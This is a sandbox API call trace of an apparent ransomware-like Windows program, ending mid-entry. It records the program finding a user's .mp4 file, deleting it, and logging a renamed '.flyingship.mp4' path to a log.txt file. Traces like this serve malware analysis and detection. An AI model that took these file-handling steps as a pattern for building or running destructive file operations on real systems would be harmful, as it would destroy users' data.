[0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0162.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.271] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.271] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.271] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.271] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.271] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0162.271] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.271] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.271] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.273] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.273] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.273] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.273] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.273] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpFilePart=0x0) returned 0x52 [0162.275] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0x626d100, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 0x90ae18 [0162.275] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\qpuo-bpnhjloiyjrui7.mp4")) returned 1 [0162.278] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x266210e0, ftCreationTime.dwHighDateTime=0x1d5e0d3, ftLastAccessTime.dwLowDateTime=0xcfa2aa80, ftLastAccessTime.dwHighDateTime=0x1d5dace, ftLastWriteTime.dwLowDateTime=0x626d100, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf55d, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="qPUo-BPNhJloiyjRuI7.mp4", cAlternateFileName="QPUO-B~1.MP4")) returned 0 [0162.278] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0162.278] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.279] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.279] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0162.279] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0162.279] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0162.279] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.279] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.279] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.279] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0162.279] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0162.280] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.281] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0162.281] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.281] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0162.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0162.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0162.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.282] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0162.282] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x7db, lpOverlapped=0x0) returned 1 [0162.282] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0162.282] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x7db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0162.282] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0162.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0162.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0162.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\n", cchWideChar=96, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 96 [0162.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0162.283] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\n", cchWideChar=96, lpMultiByteStr=0x9a5d10, cbMultiByte=96, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 96 [0162.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0162.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0162.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0162.283] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5f, lpOverlapped=0x0) returned 1 [0162.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0162.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0162.283] CloseHandle (hObject=0x138) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c5180 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0162.286] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0162.286] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.287] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0162.287] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.287] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.287] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0162.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0162.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0162.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0162.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0162.288] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0162.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0162.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.288] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.288] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0162.289] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0162.289] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.290] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0162.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0162.290] RtlAllocateHeap 